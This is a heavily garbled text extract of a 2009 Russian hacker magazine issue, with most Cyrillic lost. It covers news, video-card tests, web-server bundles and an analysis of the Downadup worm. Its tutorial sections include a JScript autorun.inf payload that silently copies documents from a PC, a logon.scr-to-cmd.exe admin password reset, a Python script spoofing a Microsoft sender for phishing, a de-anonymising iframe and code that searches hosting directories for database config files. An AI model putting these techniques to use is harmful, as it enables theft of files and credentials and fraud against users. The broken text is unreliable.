Вы находитесь на странице: 1из 148

DOWNADUP: 10 000 000 4

. 28

x 02()2009

w w w.xakep.ru
02 (122) 2009

FACEBOOK/



. 42

PYTHON 3000
NETCAT

122


CMS
. 46

3
. 90


*NIX
. 126

.
, ,
Facebook.
, :
G-talk SQL-
-
, . -

. - : ,
.
, :).
nikitozz, . .
udalite.livejournal.com

CONTENT02(122)
004

MEGANEWS

086

JAVA

090

FERRUM
012

PYTHON 3000:
094

098

\++

PC_ZONE
016

,
022

100

-
026

2009

104


028

2009

EASY HACK

SYN/ACK
112

HYPER-V: WINDOWS SERVER 2008


122

WIN2K8


042

FACEBOOK.COM

126

AIST NETCAT

050

CMS
132

KERNEL MODE VMWARE


056


-TOOLS

139

2: -
ICMP

070


MOZILLA

076

080

, FUSE
LINUX:

142

X-PUZZLE

X-STUFF

066

8,5

140

062

FAQ UNITED
FAQ

136


060


*NIX


046

118


036

032

108

DOWNADUP ,

AVR
ARDUINO

144

WWW2
WEB-

016

042

086

104

>
nikitozz
(nikitoz@real.xakep.ru)
>
gorl
(gorlum@real.xakep.ru)
>

Forb
(forb@real.xakep.ru)
PC_ZONE UNITS
step
(step@real.xakep.ru)
UNIXOID, XAKEP.PRO PSYCHO
Andrushock
(andrushock@real.xakep.ru)

Dr. Klouniz
(alexander@real.xakep.ru)

Dlinyj
(dlinyj@real.xakep.ru)
>

(lyashchenko@gameland.ru)

/DVD

>
Step
(step@real.xakep.ru)
> Unix-
Ant
>

(komarov@gameland.ru)
>

/Art

>-

(novikov.e@gameland.ru)
>

(svetlyh@gameland.ru)
>

/xakep.ru

>

(xa@real.xakep.ru)

>


(goryacheva@gameland.ru )
>

(olgaeml@gameland.ru)

(alekhina@gameland.ru)
(belov@gameland.ru)
>

(maksimova@gameland.ru)
>

(Strekneva@gameland.ru)

/Publishing

>

(noah@gameland.ru)
>

>

(dmitri@gameland.ru)
>

(shostak@gameland.ru)
>

(romanovski@gameland.ru)
>

(stepanovm@gameland.ru)
>

(leonova@gameland.ru)
>

(ladyzhenskiy@gameland.ru)
>PR-

(litvinovskaya@gameland.ru)

>


(andrey@gameland.ru)
>

(kosheleva@gameland.ru )

>

(goncharova@gameland.ru)
.: (495) 935.70.34
: (495) 780.88.24
>
.: 8 (800) 200.3.999

>
101000, ,
, / 652,


,

77-11802 14 2002 .

ScanWeb, .
100 000 .
.

.
:

. ,

,
.

.


.

.

>> meganews

Meganews

MIFRILL
/ MIFRILL@REAL.XAKEP.RU /


-.
Net-Worm.Win32.Kido,
10 . .
,
Microsoft Windows.

, (
, F-Secure Kaspersky Lab),
,
malware, spyware, virus .

. ,
. , , .
,
,
,
- . Microsoft , ,
. ,
,
.
, , .

5 2.5 .


Apple ,
Mac-
. , 100%,
. , . , 2009
Mac OS

004

X .
. - Mac OS
X ( ,
). ,
0.4-0.5% -, .

$250.000 .

X 02 /122/ 09

>> meganews

3D
NVidia ,
, ,
.

3D-: nVidia GeForce 3D Vision.
, , 10
, ,
, ,
.
,
-
. ,

100 .
2009 , ,
Samsung SyncMaster 22"
2233RZ ViewSonic VX2265wm. ,
Samsung $399,

, .
NVidia
.
GeForce 3D Vision,
: , , .
,
,

.
350
( ),
.
, -, SLI .

, GeForce 3D Vision
40 $199.
,
. , NVidia
.

16% .

?
...
,

. Seagate .
Barracuda 7200.11, Barracuda ES.2 Diamond
Max 22, 2008 ,
. -
, (
-
). ,
-,

Seagate
,
. Seagate
.
,
,
.
X 02 /122/ 09

005

>> meganews

Google
- Google, , , .
, 2005
.
. , ,
, . ,
. ,

-, ,

hit-and-run.
, ,
, , . , ,
3 . ,
.

YouTube mute
, ,
YouTube



,
.



, .

, , , .
YouTube ,
, .
, : This video contains an audio track that has not been
authorised by all copyright holders. The audio has been disabled.
,

. , YouTube, ,
,
.



,
.
,

. ,

, . , , ,
.
,
,
,
,
.
,
,

, (

).
,
, ,
.

006

X 02 /122/ 09

>> meganews
DSecRG
dsecrg.ru , Digital Security.
, 7
. Digital Security
DSec Research Group,

.

SecurityFocus Milw0rm.com,
dsecrg.ru.
, DSecRG, .

Twitter

753%.

-

.

.
MI5
, .
, , 3 -

. ,

( , , e-mail) , .
, .
, ,
,
!

Palm strikes back


Palm,
, .
Palm Pre, webOS, CES 2009 ,
, .
QWERTY-,
59.5100.516.95 136 . , , iPhone,
3.1", 320x480 . 3 ,
WiFi, Bluetooth, GPS 3G EVDO rev. A,
3.5 8 .
, .
TouchStone
. , Palm Pre, , ,
. 4 . Palm
Pre , .
Web OS, , Linux ,
HTML JavaScript. , , -. , webOS , ,
, , SMS
IM-. ,
2009 .
X 02 /122/ 09

007

>> meganews
DivX
DivX 7- ,
2009, DivX
Plus HD H.264 (Matroska, .MKV). ,
DivX
.mkv.
, -

HQ,
,
. Sigma Designs Trident
Microsystems, ,
,
. - .mkv !

28% e-mail, IM .

, -
,
. Sony
, Sony
Cyber Shot G3, 3.5" Wi-Fi.
,

YouTube, Photobucket, Shutterfly .

- Microsoft
.
008

, , .
Sony ,
. Cyber Shot G3
10- Carl Zeiss, 4-
4 ( Sony Memory Stick
). , , $500.

5.000 . 5%
X 02 /122/ 09

>> meganews
AOL

America online
ICQ ,
,
, .
21- -

icq- ,
. ,
. ICQ
,
-. Miranda
QIP, , , 1.00
QIP, Miranda. ICQ, ,
. AOL
,
, .
AOL ,
.
ICQ , Jabber,
.
Jabber, ICQ 6.5. ,
AOL, , , .

-, , ,

7.7% ( 81.4%).

Microsoft

Microsoft -
.
Intenet Explorer. 2007 Opera Software
Microsoft ,
Free Software Foundation. ,
IE Windows ( Microsoft
1996 )
, , : .
X 02 /122/ 09

IE Windows 2002 ,
.
Microsoft
, , , ,
Windows+IE . Microsoft 8 ,
,
.

009

>> meganews
iTunes
2009 Apple DRM. iTunes -
(DRM), 2007
.

80% , ,
DRM, , mp3-
.
.

iTunes $0.99,
. :
69 $1.29.
. , Apple ,
$0.69 .

,
!, . ,
.
Troj/Qhost-AC,
(The Pirate Bay, Mininova
..), , :
!.
, .

010

system32\
drivers\etc\hosts hosts,
127.0.0.1. The Pirate Bay
, . , TorrentFreak , ,
, RIAA. ,
:). , , ,
, .
X 02 /122/ 09

>> meganews
Windows 7

, - Windows 7 , , .
Microsoft , 7- .
Microsoft , - - ,
, , ,
. ,
2.5 . . Windows 7
32- 64- ,
1 , 1 128
Aero, 16
. - 2009,
,
.

SP2 Vista
(

IT-

2009).

1-2

-,
ITpedia.
ru. ,
. ,
. MediaWiki.
Wikipedia, GNU FDL. 400 , .
ITpedia , .
, , ,
, . IT-,
.
, , , , .
!

2008

Twitter

4.43 .



aka Maksik , 30
. , 2007 ,
. , ,
, , ,
. 11 . , , 12 .
2005-2007
TJX, 40
.
, .
Maksik $23.200, , -
, . 30
. . , 11 ?
X 02 /122/ 09

011

>> ferrum

,
. , .
,
,
.


Windows Vista SP1. ,
, , XP

! , , , Futuremark.
3DMark06, ,
, Vista, 3DMark Vantage.
, , , ,
. Crysis, Devil May Cry 4, Company
of Heroes Call of Juarez
, .
16001200, (16) (4). ,
DirectX 10.
, .

012

:
: Intel Core 2 Quad, 3
: Asus Striker II Extreme
: nVIDIA nForce 790i Ultra SLI
: 8192 (DDR3 SDRAM)
: 1 , WDC WD10 EACS-00ZJB0 SCSI,
: Microsoft Windows Vista Ultimate Service Pack


:
Gigabyte GV-NX88U768H-B (GeForce 8800 Ultra)
Gigabyte GV-NX98X1GHI-B (GeForce 9800 GTX)
Gigabyte GV-NX98X512H-B (GeForce 9800 GX2)
Sapphire Toxic HD 4850 512M GDDR3 (Radeon HD 4850 Toxic)
Sapphire HD 4870 X2 2G GDDR5 (Radeon HD 4870 X2)
XFX GX-280N-ZDD9 (GeForce GTX 280)
X 02 /122/ 09

>> ferrum
DEVIL MAY CRY, 1600X1200, 4XAA, 16XA

CRYSIS, 1600X1200, 4XAA, 16XAF

XFX GX-280N-ZDD9

XFX GX-280N-ZDD9

Sapphire HD 4870 X2 2G GDDR5

Sapphire HD 4870 X2 2G GDDR5

Sapphire Toxic HD 4850 512M GDDR3

Sapphire Toxic HD 4850 512M GDDR3

Gigabyte GV-NX98X1GHI-B

Gigabyte GV-NX98X1GHI-B

GigabyteGV-NX88U768H-B

GigabyteGV-NX98X512H-B

GigabyteGV-NX88U768H-B

GigabyteGV-NX88U768H-B
0

000

20

40

60

80

100

120

140

160

180

eps

000


, .
!

eps

10

15

20

25

30

35

,
:
AMD

Gigabyte GV-NX88U768H-B
GeForce 8800 Ultra
:

: G80U
, : 681
, : 90
, : 612
, : 1080 (2160 )
, : 768 GDDR3
, : 384
, /: 101,3
: PCI Express 2.0 x16
: 2 DVI, S-Video
EST

BUY
BE
ST BUY

BEST BUY

8000 .

Gigabyte GV-NX98X512H-B
GeForce 9800 GTX
:

: G92GTX
, : 754
, : 65
, : 675
, : 1100 (2203 )
, : 512 GDDR3
, : 256
, /: 68,8
: PCI Express 2.0 x16
: 2 DVI, S-Video

6000 .
Gigabyte GV-NX88U768H-B
G80U, Ultra.
.
NVIDIA ,
. 3.
, (
). , ,
, . ,
.
Supreme Commander
Warhammer 40000 Dawn of War.
.

. : 27
. ,
. ,
.
X 02 /122/ 09

NVIDIA
. Gigabyte,
,
.
,
. , . G92, 65- , 512 GDDR3,
HybrydPower (
) 3-way SLI ( SLI ).
. ,
, , .

,
Gigabyte GV-NX88U768H-B,
.
.

013

>> ferrum
3DMARK VANTAGE, OVERALL

COMPANY OF HEROES, 1600X1200, 4XAA, 16XAF

Sapphire HD 4870 X2 2G GDDR5

XFX GX-280N-ZDD9

Gigabyte GV-NX98X1GHI-B

Sapphire HD 4870 X2 2G GDDR5

XFX GX-280N-ZDD9

Sapphire Toxic HD 4850 512M GDDR3

Gigabyte GV-NX98X512H-B

Gigabyte GV-NX98X1GHI-B

Gigabyte GV-NX88U768H-B

Gigabyte GV-NX98X512H-B
Gigabyte GV-NX88U768H-B

Sapphire Toxic HD 4850 512M GDDR3


0 2000
000

4000

6000

8000

10000

12000

14000

Marks

000

eps

10

20

30

40

50

60

70

.
NVIDIA,
Radeon HD 4850

, .

Gigabyte GV-NX98X1GHI-B

Sapphire Toxic HD 4850 512M


GDDR3

GeForce 9800 GX2


:

: 2 x G92GX
, : 754 2
, : 65
, : 600
, : 1000 (1998 )
, : 512 GDDR3 2
, : 256 2
, /: 62,4 2
: PCI Express 2.0 x16
: 2 DVI, HDMI

18000 .
,
,
,
. Gigabyte GV-NX98X1GHI-B.
G92. NVIDIA ,
.
.
SLI,
. PCI-Express, ,
.
,
Quad SLI .
PureVideo HD, HybridPower, HDMI HDCP .
Samsung 0.8 , 2500 .

, , ,
.

014

Radeon HD 4850 Toxic


:

: RV770
, : 956
, : 55
, : 675
, : 1150 (2300 )
: 512 GDDR3
, : 256
, /: 71,9
: PCI Express 2.0 x16
: 2 DVI, S-Video

6000 .
. , , , . Sapphire Radeon,

. ,
AMD RV770. Sapphire Radeon HD 4850 Toxic
.
Toxic ,
.
Zalman , ,
. , . ,
Power DVD DVD Suite, 3DMark Vantage
Advanced.

,
. . 8%
!
X 02 /122/ 09

>> ferrum
CALL OF JUAREZ, 1600X1200, 4XAA, 16XAF

3DMARK06, OVERALL
Sapphire HD 4870 X2 2G GDDR5

XFX GX-280N-ZDD9

Gigabyte GV-NX98X1GHI-B

Sapphire HD 4870 X2 2G GDDR5

XFX GX-280N-ZDD9

Sapphire Toxic HD 4850 512M GDDR3

Gigabyte GV-NX98X512H-B

Gigabyte GV-NX98X1GHI-B

Gigabyte GV-NX88U768H-B

Gigabyte GV-NX98X512H-B

Sapphire Toxic HD 4850 512M GDDR3

Gigabyte GV-NX88U768H-B

000

Marks

0 2000 4000 6000 8000 10000 12000 14000 16000 18000

000

EDI

10

20

30

40

50

60

70

80

90

TO

TORs

s CHOICE

EDI

ICE

, AMD . , Call of Juarez

Sapphire Toxic HD 4850 512M


GDDR3. -
AMD RV770

HO

eps

14000 .

Sapphire HD 4870 X2 2G GDDR5 XFX GX-280N-ZDD9


Radeon HD 4870 X2
:

GeForce GTX 280


:

: 2 RV770
, : 956 2
, : 55
, : 750
, : 1000 (2000 )
: 1 GDDR5 2
, : 256 2
, /: 62.5 2 ( 174.4
CrossFireX SidePort)
: PCI Express 2.0 x16
: 2 DVI, S-Video

: GT200
, : 1400
, : 65
, : 670
, : 1250 (2500 )
: 1 GDDR3
, : 512
, /: 141,7
: PCI Express 2.0 x16
: 2 DVI, S-Video

18000 .
2- NVIDIA,
AMD. RV770 ,
.
, NVIDIA
. 8
Hynix , .
PLX Technologies.
48 PCI-Express 3.8
.

XFX
GeForce GTX280 XXX Edition. XXX Private, , , XFX . , ,
,
.
,
NVIDIA. -
. ,
, . , ,
Dont disturb. Im gaming!,
Asassins Creed. !


, . ,
,
.

6- . . , .

, , ,
, .
( FPS ) Gigabyte GVNX88U768H-B. , ,

. ( ) Sapphire HD 4870 X2 2G GDDR5.


. z

X 02 /122/ 09

015

>> pc_zone

/ KOMAROV@ITDEFENCE.RU /

.

. ,
, . , , , .
,
, ,
. ,
,
. .

. ,
USB-
, -
, ,
. , !
USB, COM, LPT Firewire, IDE SATA, PCMCIA

016

Bluetooth, Wi-Fi, IrDa.



,
. DeviceLock (www.devicelock.com/ru), Zlock
(www.securit.ru/products/info/zlock), Sanctuary Device Control (www.
lumension.com). ,
(, Microsoft Windows Vista),
.
,
. : (
), .
Windows Server 2008,
X 02 /122/ 09

>> pc_zone

, Active Directory.

(Local Group Policy Editor), cmd.exe > gpedit.msc.
Administrative Templates-SystemDevice Installation. Allow installation of
devices that match any of these device IDs - ,
. ,
.
? Device Manager (
)
USB Mass Storage
Device. :
USBSTOR\Disk&Ven_JetFlash&Prod_
TS2GJFV30&Rev_8.07\XXXXXXXX&0,

XXXXXXXX ID.
,
gpupdate .
!

-
, ,
,
, .
, ,
,

.
JavaScript. .
, , (
):
var patch = /\.(doc|rtf|xls|txt)$/i;
var diff = new Date(2007,05,01);

,
.
,
:
X 02 /122/ 09

Maltego,
, ,

var softwareEnumerator = new Enumerator(


softwareFolder.Files);
softwareEnumerator.moveFirst();
for (; !softwareEnumerator.atEnd();
softwareEnumerator.moveNext())
{
if ((softwareEnumerator.item().
Name.match(patch))
&&((Date.parse(softwareEnumerator.
item().DateCreated) >= diff.getTime())
||(Date.parse(softwareEnumerator.item().
DateLastAccessed) >= diff.getTime())
||(Date.parse(softwareEnumerator.item().
DateLastModified) >= diff.getTime())))
{
try
{
fso.CopyFile(##
);
} catch (e) {
if (e.number == 61) {
WScript.Quit(0);
}
}
}

info

-
Office 97
GUID (
),
MAC .

, HEX-,

GUID.


.
,
.inf- .
wscript
:
[autorun]
shellexecute=wscript autorun.js
shell=update
shell\update=
shell\update\command=wscript autorun.js


,
, - .

017

>> pc_zone

BootCD

warning


,

.



.

dvd


,

.

018

.
, .
,
: , , , ?
, ,
- ,
: ?.
: SMTP- Relay () . ,
. ,
telnet:

BIOS

. . ,

. ,
. LiveCD Linux.

. ,

telnet smtp_server 25
>220 smtp.*.ru ESMTP Sende-mail 8.9.3/8.9.3;
Mon, 27 May 2002 17:38:54 +0400 (MSD)
helo smtp_server
>500 Command unrecognized: {{}helo smtp_server

> 250 smtp.*. , pleased to meet you ,

e-mail from:
misha@real.xakep.ru
rcpt to: lamer@e-mail.ru
data _ [enter]
.

.
:
C:\> cd \winnt\system32
C:\winnt\system32> copy logon.scr logon.
scr.old
C:\winnt\system32> del logon.scr
C:\winnt\system32> copy cmd.exe logon.scr

,
, , .
cmd.exe,
, .
net user administrator <newpassword>.
X 02 /122/ 09

>> pc_zone
[enter]
250 RAA07552 Message accepted for delivery

real.xakep.ru . ,
. -, SMTP-
- IP-. -,
. Exchange
Server 2007, , .
,
DNS , , IP-,
,
, .
,
.
.
, ,
? Reply-To
.
- . :
Reply-to Errors-To,
, .
, Reply-to, (
), , Errors-To.
To: jertva@mail.ru
From: Support <support@microsoft.com>
Reply-To:Support <technical.support@microsoft.com>
Errors-To:Support moe_milo@mail.ru

, technical.support@microsoft.com , moe_milo@mail.ru. , Reply-To ,


Errors-To , ,
header . ,
( telnet netcat
). , - SMTP.
Python, SMTP :).
:
import smtplib, sys, MimeWriter, mimetypes, mimetools,
base64

,
Reply-To Errors-To addheader():
writer = MimeWriter.MimeWriter(message) #

writer.addheader('To', to)
writer.addheader('From', sender)
writer.addheader('Reply-To', 'usual@mail.ru') #

writer.addheader('Subject', subject)
writer.addheader('MIME-Version', '1.0')
writer.startmultipartbody('mixed')

:
part = writer.nextpart()
body = part.startbody('text/plain')
X 02 /122/ 09

?
,
,
:
Dir /t:a /a /s /o:d c
(
C);
Dir /t:w /a /s /o:d d
( D);
Dir /t:c /a /s /o:d e
( E).
, , FTP-c,
. FTP SITE STATS,
FTP- .

part.flushheaders()
body.write(text)

, sendmail():
smtp = smtplib.SMTP(SERVER, PORT)
smtp.set_debuglevel(1)
smtp.sendmail(sender, to, message.getvalue())
smtp.quit()

, , ,
, DVD.

, , .

, ?
.
, ,
.
, .
,
,
() ,
(, ), , . , IP-
. ,
Exchange, -
.
, .
( ..).

Metasploit Decloak (decloak.net). , , . ,
Java.
Quick Time, (direct)
.
Word- -,
,

019

>> pc_zone

/ STEP@GAMELAND. RU/

, . ,

DNS- .
Flash-,
iTunes,
itms.
Decloaking Engine Remote API,
. ,
:
md5("secret" . $_SERVER['REMOTE_ADDR'] . $_
SERVER['REMOTE_PORT'] . time() . "secret");

, :
<iframe src="http://decloak.net/decloak.html?cid=<
>"></iframe>

,
IP-

decloak.net/report.html?cid=<>&format=te
xt

LDAP

, (
, ).
LDAP, , ,
Windows- Active Directory.
anonymous-,
FTP. LDAP 389/636,
nmap: Nmap sV host
p 636 PN.
(LdapBrowser/Ldap Explorer). Linux/Unixlike-
: ldapadd, ldapcompare,

020

ldapdelete, ldapmodify, ldapmodrdn, ldappasswd, ldapsearch,


ldapwhoami. LDAP
, ,
. :
ldapsearch -LLL "(sn=smith)" cn sn telephoneNumber
dn: uid=jts, dc=example, dc=com
cn: John Smith
cn: John T. Smith
sn: Smith
sn;lang-en: Smith
sn;lang-de: Schmidt
telephoneNumber:
1 555 123-4567 z
X 02 /122/ 09

>> pc_zone

/ ALEX.RAIDEN@GMAIL.COM /

!
-

, . ,
,
. , ,
. -!

- ,
, 2-3 - ,
. , ,
, -
, Denwer.
, Apache
JRuby,
, , . ,
,
( , )
.

-
-, (http://denwer.ru),
,

022

PHP. , . -, ,
PHP, Perl MySQL
4 . ,
. ? ,
: PHP, PostgreSQL, MySQL,
ActivePerl Python Parser 3. Denwer ,
, .

.
Denwer . .
site.com home ,
www, . ,
X 02 /122/ 09

>> pc_zone


,
!

Denwer XAMPP ,

Denwer,
hosts vhosts.conf Apache. , , ,
, !
:


.
XAMPP (www.apachefriends.org/en/xampp.html),
( , Windows/Linux/MacOS/Solaris).
Apache/MySQL/PHP ,
-, FTP-, SSL .
Lite-,
. ,
. , Denwer, XAMPP :
Tomcat, Perl
. XAMPP Lite
Denwer, ,
( , 43 4- Denwer-).
:
. ,
, . , Apache. ,
, ,
.
: ,

7 ,
: Just unpack and RUN!.
Win32-,
MacOS Solaris? UniformServer
, -
.
, . ,
, ,
.
, 4 5, ,
( -, )?
Denwer- XAMPP, , ?
,
? . ,


, UniformServer (http://www.uniformserver.com)
, . ,
( , 3.5,
2008 , ), ,
,
. Apache,
MySQL PHP
-.
UniTray, .
, , FTP-.
Java- Tomcat
Resin. XAMPP
X 02 /122/ 09

023

>> pc_zone


PHP

- GUI

XAMPP Lite! ... , , WAMPserver (www.wampserver.com),


, .
, .
.

Apache c MySQL. , WAMPServer

, . Apache
1.3 + PHP 5.1.2 MySQL 5.1.30? ,
. ,
,
- .
WAMPserver ,
, PHP
. ,
, -, ,
!
:


BitNami ,
.
-, Apache, MySQL,
. : PHP, Python, Ruby Java.
phpMyAdmin
.
- , ,

( )
.
:
DjangoStack Python- Django,
Apache, MySQL, Python SQLite;
JRubyStack , Ruby Java. GlassFish, Sun JDK, Ruby On Rails, Tomcat,
Subversion MySQL. ,
, ,
war-
Tomcat. ,
, .
IDE Ruby;
LAMPStack Linux,
Apache, PHP MySQL ( phpMyAdmin).
MySQL, LAPPStack ,
PostgreSQL;
MAMPStack MAPPStack LAMP,
. Apache, PHP MySQL PostgreSQL MacOS X ( Intel , PowerPC).
, Solaris SAMPStack. ,
OpenSolaris ;
WAMPStack WAPPStack Windows, , LAMP;
RubyStack - Ruby
Rails, MySQL Subversion, Ruby. , -,
( RoR !).
,
.
,


dvd


DVD-.

024

Portable-? Uniform- , ,
. MiniServer ,
, .
BitNami, . MiniServer, Apache, Apache + PHP, MySQL 4/5, ReverseProxy, Joomla, PhpBB, XOOPS, Wordpress MediaWiki.
portable- .
SourceForge.net: http://sourceforge.net/project/showfiles.php?group_id=53691&package_
id=275691.
. ,
Nokia E90 N95 - PAMP Apache, MySQL PHP (http://sourceforge.net/projects/pamp). , !
X 02 /122/ 09

>> pc_zone

Windows,

. BitNami . , -. , Wordpress
- SugarCRM JasperServer,
. ,
,
. ,
! , BitNami
.
, Web 2.0, , .
(http://bitnami.org/polls)
, BitNami.
, Asterisk (
,
).
:


BitNami
-. , ,
?
-
, Windows ,
Linux OpenBSD.

IDE -. ,
- , ,
. , ,

www.microsoft.com .
-
, .
- ,
Naraio (http://sourceforge.net/projects/naraio).
,
, , , . OpenLDAP Subversion, Python Ruby,
X 02 /122/ 09

, , ! ,
- -. ,
, Apache. , .
, Pi3Web (www.pi3.org) HTTP 1.1
++, CGI/FastCGI,
Java-. Yass (http://
yaass-project.sourceforge.net)
- Apple iTunes Flash-e,
MP3-.
httcld Tkl, -
Linux-. ++ ( Java)
CPPSERV (http://sourceforge.net/projects/cppserv)
, Servlet-API
++.
, ++ !
Java
Simple, , ,
API .
Java,
Tomcat.
RESTles (www.restlet.org)
REST- ( ,
HTTP-).

Trac .
,
, Trac SVN OpenLDAP
, ,
,
(phpldapadmin).
!
:

SERVER SHUTDOWN
,
. ,
- - ( ),
, .
,
.
!
PHP-
Denwer. ,
, WAMPserver-,
-
PHP MySQL. ,
UniformServer Naraio ! ,

, -
! z

025

>> pc_zone
STEP




I T-

,


!



2 0 0 9 .



2009
4-5 2009. : ,
Microsoft . , ,
.

,
Microsoft . ,
, (
, -,
) , Sysinternals
. - ,
Filemon Regmon
task- Process Explorer RootkitRevealer,

026

.
! , ,
, . ,
? ,
,
, , , DVD.
WINDOWS-
IT-!
, , X 02 /122/ 09

>> pc_zone

links

Windows. ,
, ,
, Microsoft Debugging Tools Sysinternals,
Process Explorer, Process Monitor Accesschk.

, ,
.
WINDOWS
Windows- . , ,
, ,
. ,

.
, Code Integrity, PatchGuard User
Account Control , .
, Windows
.


, ,
C#
, LINQ.
F#,
Microsoft. -
, ASP 4.0 , ,
- MVC. ,
, , ( ), - ( ).
ASP.NET MVC Framework,
Microsoft, .
X 02 /122/ 09



Microsoft.
SQL Server 2008,
.
,
Windows Server 2008 Failover
Clustering Microsoft Hyper-V.

PowerShell
2.0,
.

,
. , .
, ?
,
?
NAP, , -, .
Exchange Server
2007 Microsoft Forefront
Security.
4FREE
,
. ,
, ,
. , ,
level-up. z

,
,


:
http://platforma2009.ru.

warning

,
TechEd,


2002 .

dvd



,
,
.

027

>> pc_zone

Downadup 20 Symantec


RPC- (- , ?).
,
,
. Windows Automatic Update Service
(wuauserv). - , , MS08-67,
. .
. API-,
DNS,
. , , , DNS-, DNS_Query_A, DNS_Query_W DNS_Query_W,
,
. ,
Microsoft
. ,
:

microsoft
symantec
norton
mcafee
trendmicro
sophos
panda
avast
avira
avp
avg
kaspersky
f-prot
nod

.
,
.
Windows Security
Center Service (wscsvc), Windows Defender Service
(WinDefend). Microsoft
(
), 2 Windows Error Reporting
Service. , ,
, , .
Vista
X 02 /122/ 09

F-Secure
Autorun.inf

links

: autorun.inf,

TCP/IP, . , ,
Vista, ,
:
netsh interface tcp set global
autotuning=disabled

3:

,
Downadup.
:
1. , ADMIN$;
2. 0867,
Windows;
3. , .
!
.




:
www.microsoft.com/
technet/security/
Bulletin/MS08-067.
mspx

F-Secure,



(
-):
www.f-secure.com/
weblog/archives/
Downadup_Domain_
Blocklist_February.txt

4:

. NetServerEnum, , .
,
,
. . , API- NetUserEnum,

, ,
. :

029

>> pc_zone
STEP

2009
DOWNADUP ,

Downadup, Conficker, Kido , , -. : , .


?
: , .

, :).
, Downadup 9 11 . , . , ,
, Microsoft .

,
.
, Downadup .
, ,
. ?
.

1:

,
:
%System%\[Random].dll
%Program Files%\Internet Explorer\[Random].dll

028

%Program Files%\Movie Maker\[Random].dll


%All Users Application Data%\[Random].dll
%Temp%\[Random].dll
%System%\[Random].tmp
%Temp%\[Random].tmp

- (

)
. ,
.
,
, %System%\kernel32.dll.
, . ,
Downadup svchost.exe, explorer.exe services.exe.

2:
,
, ,
.
.
. , ,
X 02 /122/ 09

>> pc_zone



Downadup ,
.
, Security Center Notifications
Windows Defender.
:
HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\
Parameters\FirewallPolicy\StandardProfile\
GloballyOpenPorts\List, [PortNumber]:TCP = [PortNumber]:
TCP:*Enabled:[random]

, , :
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\
CurrentVersion\explorer\Advanced\Folder\Hidden\SHO
WALLCheckedValue = dword:00000000
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\
CurrentVersion\SvcHost, netsvcs = %Previous data% and
%Random%

[ ]
[ ][ ]
[ ]
111111
qwerty
..

,
, ADMIN$,
:

warning




.

info


UPnP-


http-.

030

\\[Server Host Name]\ADMIN$\System32\[random


filename].[random extension]

,
, :
rundll32.exe [random filename].[random
extension], [random]

5:

,
( ) .
Downadup ,
MS08-067 .
RPC-, wcscpy_s netapi32.
dll. -, . ,
http://www.getmyip.org,
http://checkip.dyndns.org IP- (%ExternalIPAddress%).

?
,
?
, , ,
Google Analytics - :).
,
, ,
c Downadup .
,
250 ,

. ,
F-Secure Symantec,
.
,

.
HTTP, -
:
x.x.x.x [16/Jan/2009:09:45:09 -0700]
GET /search?q=29 HTTP/1.0 404 282 Mozilla/4.0 (compatible; MSIE 6.0;
Windows NT 5.1; SV1)

, .
NAT
IP. IP User-Agent
. :
/search/q=< >
, . , MS08-067 ,
,
.
29 .
, ,
,
.
F-Secure, 8 16 . !

HTTP-
:
http://%ExternalIPAddress%:%RandomPort%

HTTP-

. , ,

HTTP. ,
X 02 /122/ 09

>> pc_zone

: bmp, gif, jpeg, png. , , TCP-:


HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\
Tcpip\Parameters
"TcpNumConnections" = dword:0x00FFFFFE

, , (, ),
NetpwPathCanonicalize.

6:

, USB-, ,
, .
, , , autorun.inf. , Downadup
, !
Autorun.inf, ,
, ,
, .
. Windows
, :
Open=RUNDLL32.EXE .\RECYCLER\jwgvsq.vmx

, DLL- jwgvsq.
vmx, ,
autorun.inf.

7:

. Downadup, 8-9 , . , , ,
, , ,
. ,
-, , , -, - .
, ,

, , :).
.
X 02 /122/ 09


,
. , - ,
. :
1. -, :
[HKLM\SYSTEM\CurrentControlSet\Services\netsvcs].
2. %System%\<rnd>.dll
:
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\
SvcHost] netsvcs.
3. .
4.
(
, ).
5. :
%System%\<rnd>.dll, <rnd> .
6. :
<X>:\autorun.inf
<X>:\RECYCLER\S-5-3-42-2819952290-8240758988879315005-3665\.vmx, rnd , X .

.
: - HTTP-.
-
, ,
, ?
.
. Downadup . 250
, , , .
,
,
. .
. Downadup
(google.com,
baidu.com, w3.org ) , .

(%PredictableDomainsIPAddress%), . , 1 2009
, :
http://%PredictableDomainsIPAddress%/search?q=%d

? ,
. ,
,
, .
,
, , . Downadup,
. , .
,
. , !z

031

>>

Easy Hack}

R0ID SKVOZ
/ R0ID@MAIL.RU /

/ KOMAROV@ITDEFENCE.RU /

:
. , z.
, , , - . ,
,
, - (aka ).

-. , . ,
, FRIENDS CONTROL EnoT_PoToSkUn
php-.
. , :

,

.
:
1. ;
2. :
id,
;
$on_mail /
(0-, 1-);
$write_noresult
(0- - -/ 1-).
3. // PHP => 5 , LibCurl
Cron ( ).
4.
5.
, .
/ .
, , , :).

, ,

:
-
. ,
:
-.
- .
phpConfigSpy p-range &
$re@m3r. /home/_/public_html , ,
. , ,
, , ,
.

032

, -.
:
1. , ( )
:
($file=='config.php')
or ($file=='config.inc.php')
or ($file=='conf.php')
or ($file=='settings.php')
or ($file=='setup.php')
or ($file=='dbconf.php')
or ($file=='dbconfig.php')
or ($file=='db.inc.php')
or ($file=='dbconnect.php')
or ($file=='connect.php')
or ($file=='index.php')
or ($file=='common.php')
or ($file=='config_global.php')
or ($file=='db.php')
or ($file=='connect.inc.php')
X 02 /122/ 09

>>
or ($file=='dbconnect.inc.php'))

2. 24 :
$dirz = '/home/'.$username.'/public_html/';

: MBOOK

:
/ - .

. MBook
:). MBook Nightmar,
Mod-Site (MBook). , :
1. , :).
2.

MBook ( , ,

MBook + inurl:
cgi-bin/gb/gb).
3.
sites.
txt,
, :

43 , - :
$path = '/home/ '.$user. '/public_html/ ';

3. .

4. . , , :).
5. ,
:
1) ;
2) , E-mail URL;
3) ( );
4) ;
5) IP.
, . - , :).
, - !

blablabla.com
xexexex.net
target.org

, ,
http://
.

: NEVOSOFT WWW.
ALAWAR.RU
:
- , - , -
-.
www.alawar.ru. ,
. : 60 ,
SMS, $3. ?
, .
, Alawar:

X 02 /122/ 09

1. ( ) NevoSoft .
2. . , , 60 .
, .
3. <Alt+TAB>
. ?????.tmp.
: ?.
.
4. , .
. , . -,
blabla.exe.
5. ! . , (
) . ,
!
,
.

033

>>

:
